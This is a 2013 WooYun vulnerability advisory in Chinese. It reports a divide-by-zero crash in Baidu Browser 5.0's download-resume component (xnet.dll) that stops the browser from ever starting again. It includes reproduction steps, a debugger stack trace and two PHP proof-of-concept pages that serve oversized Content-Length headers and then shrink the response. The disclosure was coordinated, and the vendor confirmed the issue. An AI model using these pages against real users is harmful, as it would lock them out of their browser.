当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-037842

漏洞标题:百度浏览器5.0正式版除以零异常永久性拒绝服务

相关厂商:百度

漏洞作者: blast

提交时间:2013-09-23 12:04

修复时间:2013-12-22 12:04

公开时间:2013-12-22 12:04

漏洞类型:拒绝服务

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-23: 细节已通知厂商并且等待厂商处理中
2013-09-23: 厂商已经确认,细节仅向厂商公开
2013-09-26: 细节向第三方安全合作伙伴开放
2013-11-17: 细节向核心白帽子及相关领域专家公开
2013-11-27: 细节向普通白帽子公开
2013-12-07: 细节向实习白帽子公开
2013-12-22: 细节向公众公开

简要描述:

断点续传考虑不周,xnet!AcquireAsynHttpService+0x2790b (div eax,ecx)引发DIVIDED_BY_ZERO异常,打开网页一回,永远用不了百度浏览器。
Exception Code: 0XC0000094(EXCEPTION_INT_DIVIDE_BY_ZERO)

详细说明:

重现步骤:
1、 打开网页 a.php(源码见证明1)
2、 此时点击下载,不要暂停,然后关闭浏览器

f1.png


f2.png


3、 服务器上的a.php在用户关闭浏览器之后内容变化了,例如证明2
4、 重新打开浏览器,断点续传xnet!AcquireAsynHttpService开始工作了,由于返回的东西比之前的要小,而且文件此时一个字都没下,这货重新获取大小,然后计算百分比,我猜的。
5、 可爱的除以0异常

f3.png


由于这个同步过程在每次启动浏览器的时候执行,所以只要下载列表里面还有这个玩意儿,浏览器就永远不可能启动成功。除非卸载而且删除用户配置。
(fe8.4e8): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\baidu\BaiduBrowser\xnet.dll -
xnet!AcquireAsynHttpService+0x2790b:
5bc4b51b f7f1 div eax,ecx
0:033:x86> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0ae9f864 5bc15b4e xnet!AcquireAsynHttpService+0x2790b
0ae9f88c 5bc14817 xnet+0x25b4e
0ae9f8b4 5bc11581 xnet+0x24817
0ae9f8ec 5bc07a08 xnet+0x21581
0ae9f908 5bc04df0 xnet+0x17a08
0ae9f934 5bc05a98 xnet+0x14df0
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\baidu\BaiduBrowser\bdcommon.dll -
0ae9f968 5e7128a3 xnet+0x15a98
0ae9f974 5e712b4b bdcommon!Util::Help::GetMimeTypeByExt+0x33c2
0ae9f9b0 5e7124d5 bdcommon!Util::Help::GetMimeTypeByExt+0x366a
0ae9f9e0 5e70fdea bdcommon!Util::Help::GetMimeTypeByExt+0x2ff4
0ae9f9f4 5e70fcad bdcommon!Util::Help::GetMimeTypeByExt+0x909
0ae9fa20 5e710d18 bdcommon!Util::Help::GetMimeTypeByExt+0x7cc
0ae9fa28 5e713159 bdcommon!Util::Help::GetMimeTypeByExt+0x1837
0ae9fa60 5e7135c9 bdcommon!Util::Help::GetMimeTypeByExt+0x3c78
0ae9fa68 5e71ca16 bdcommon!Util::Help::GetMimeTypeByExt+0x40e8
0ae9faa0 5e71caa0 bdcommon!Util::Common::Timer::EraseTimerCallback+0x58e5
0ae9faac 753f336a bdcommon!Util::Common::Timer::EraseTimerCallback+0x596f
0ae9fab8 77709f72 kernel32!BaseThreadInitThunk+0xe
0ae9faf8 77709f45 ntdll32!__RtlUserThreadStart+0x70
0ae9fb10 00000000 ntdll32!_RtlUserThreadStart+0x1b

漏洞证明:

证明1(ps 证明的A我删了点……估摸着不影响结果,如果有问题请多加点A……):

<?php
    header("Content-type: application/octet-stream");    //返回的文件    
    header("Accept-Ranges: bytes");            //按照字节大小返回
    header("Accept-Length: 899999999999999999999999999999999999989999999999999999999999999999999999998999999999999999998999999999999999999999999999999999999899999999999999999999999999999999999989999999999999999989999999999999999999999999999999999998999999999999999999999999999999999999899999999999999999");    //返回文件大小
    header("Content-Length: 899999999999999999999999999999999999989999999999999999999999999999999999998999999999999999998999999999999999999999999999999999999899999999999999999999999999999999999989999999999999999989999999999999999999999999999999999998999999999999999999999999999999999999899999999999999999");    //返回文件大小
    header("Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");//这里客户端的弹出对话框,对应的文件名
    ?>


证明2:

<?php
    header("Content-type: application/octet-stream");    //返回的文件    
    header("Accept-Ranges: bytes");            //按照字节大小返回
    header("Accept-Length: 8999999999999999999999999999999999999899999999999999999999999999999999999989999999999999999989999999999999");    //返回文件大小
    header("Content-Length: 8999999999999999999999999999999999999899999999999999999999999999999999999989999999999999999989999999999999");    //返回文件大小
    header("Content-Disposition: attachment; filename=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");//这里客户端的弹出对话框,对应的文件名
    ?>

修复方案:

别除0……

版权声明:转载请注明来源 blast@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2013-09-23 23:40

厂商回复:

感谢对百度安全的关注,我们会尽快处理此问题。
--“百度,因你更安全”

最新状态:

暂无